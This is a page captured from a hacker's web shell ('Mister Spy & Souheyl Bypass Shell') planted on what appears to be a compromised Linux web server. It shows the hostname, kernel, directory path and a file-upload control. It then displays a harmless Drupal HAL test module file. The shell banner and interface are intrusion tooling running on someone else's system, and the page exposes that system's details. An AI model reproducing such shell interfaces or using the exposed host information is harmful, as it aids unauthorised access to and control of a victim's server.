Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/html1/testsite/web/core/modules/hal/tests/modules/hal_test/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/html1/testsite/web/core/modules/hal/tests/modules/hal_test/hal_test.module

<?php

/**
 * @file
 * Contains hook implementations for testing HAL module.
 */

/**
 * Implements hook_hal_type_uri_alter().
 */
function hal_test_hal_type_uri_alter(&$uri, $context = []) {
  if (!empty($context['hal_test'])) {
    $uri = 'hal_test_type';
  }
}

/**
 * Implements hook_hal_relation_uri_alter().
 */
function hal_test_hal_relation_uri_alter(&$uri, $context = []) {
  if (!empty($context['hal_test'])) {
    $uri = 'hal_test_relation';
  }
}

/**
 * Implements hook_rest_type_uri_alter().
 *
 * @deprecated Kept only for BC test coverage, see \Drupal\Tests\hal\Kernel\HalLinkManagerTest::testGetTypeUri().
 *
 * @see https://www.drupal.org/node/2830467
 */
function hal_test_rest_type_uri_alter(&$uri, $context = []) {
  if (!empty($context['rest_test'])) {
    $uri = 'rest_test_type';
  }
}

/**
 * Implements hook_rest_relation_uri_alter().
 *
 * @deprecated Kept only for BC test coverage, see \Drupal\Tests\hal\Kernel\HalLinkManagerTest::testGetRelationUri().
 *
 * @see https://www.drupal.org/node/2830467
 */
function hal_test_rest_relation_uri_alter(&$uri, $context = []) {
  if (!empty($context['rest_test'])) {
    $uri = 'rest_test_relation';
  }
}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net